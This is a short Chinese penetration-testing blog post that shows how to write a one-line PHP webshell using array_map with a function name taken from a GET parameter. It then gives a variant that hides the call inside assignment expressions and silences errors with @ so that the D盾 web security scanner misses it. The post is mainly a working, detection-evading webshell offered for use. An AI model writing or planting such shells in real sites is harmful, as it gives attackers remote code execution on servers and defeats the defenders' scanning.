1. 首页
  2. 渗透测试

PHP过D盾一句话

日常搬砖 @X1r0z

1517572917.jpg
代码

array_map()

array_map() 函数将用户自定义函数作用到数组中的每个值上, 并返回用户自定义函数作用后的带有新值的数组

初始代码

array_map($_GET['1'],$$a);
D盾 一级

但 D盾 不拦截赋值语句

array_map($b=$_GET['1'],$c=$a);

绕过

加上 @ 关闭错误回显

原创文章,作者:Y4er,未经授权禁止转载!如若转载,请联系作者:Y4er

发表评论

电子邮件地址不会被公开。 必填项已用*标注

联系我们

在线咨询:点击这里给我发消息

QR code